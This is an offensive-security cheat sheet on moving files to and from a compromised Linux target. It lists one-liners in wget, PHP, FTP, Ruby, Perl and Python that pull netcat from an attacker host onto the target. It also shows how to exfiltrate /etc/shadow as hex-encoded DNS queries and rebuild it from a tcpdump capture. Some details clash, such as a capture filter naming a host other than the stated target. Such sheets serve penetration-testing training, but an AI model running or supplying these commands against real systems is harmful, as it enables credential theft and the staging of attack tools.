Transfer Files - Linux

Replace 20.20.20.20 with Kali attacker
Replace 10.10.10.10 with Linux target

Transfer file using wget

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, run wget to download the file

wget http://20.20.20.20:9999/nc -O /tmp/nc
Transfer file using DNS

On Kali, set up the listener:

tcpdump -w /tmp/shadow.pcap -s0 'port 53 and host 10.123.1.200'

On Linux target convert file to hex and send hex using DNS queries:

xxd -p /etc/shadow shadow.hex
for b in $(cat shadow.hex); do dig 20.20.20.20 $b.google.com; done

On Kali restore the file:

tcpdump -r /tmp/shadow.pcap -n | grep google.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > /tmp/shadow.txt
xxd -r -p /tmp/shadow.txt /tmp/shadow
Transfer file using PHP

On Kali, start a simple webserver on port 9999 to serve contents of /usr/share/windows-binaries/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, execute php to download the file:

php -r 'error_reporting(E_ALL ^ E_NOTICE);file_put_contents("/tmp/nc", fopen("http://20.20.20.20:9999/nc", 'r'));'

or

php -r 'function d($u,$o){$c=file_get_contents($u);file_put_contents($o,$c);}d("http://20.20.20.20:9999/nc","/tmp/nc");'
Transfer file using FTP

On Kali, start a simple FTP server:

twistd -n ftp -p 8888 -r /bin/

On Linux target, use ftp to download the file

ftp 20.20.20.20 8888 <<< "get nc /tmp/nc"
Transfer file using Ruby

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, use Ruby to download file via HTTP:

ruby -e "require'net/http';Net::HTTP.start('20.20.20.20','9999'){|http|resp=http.get('/nc');open('/tmp/nc','wb'){|file|file.write(resp.body)}}"
Transfer file using Perl

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, use Perl to download file via HTTP:

perl -e 'use LWP::Simple; getstore("http://20.20.20.20:9999/nc", "/tmp/nc");'
Transfer file using Python

On Kali, start a simple webserver on port 9999 to serve contents of /bin/:

php -S 0.0.0.0:9999 -t /bin/

On Linux target, if using Python 2:

python2 -c "import urllib; urllib.urlretrieve ('http://20.20.20.20:9999/nc', r'/tmp/nc')"

or

python2 -c "import urllib2; u = urllib2.urlopen('http://20.20.20.20:9999/nc'); f = open('/tmp/nc', 'w'); f.write(u.read()); f.close()"

On Linux target, if using Python 3:

python3 -c "import urllib.request; urllib.request.urlretrieve ('http://20.20.20.20:9999/nc', r'/tmp/nc')"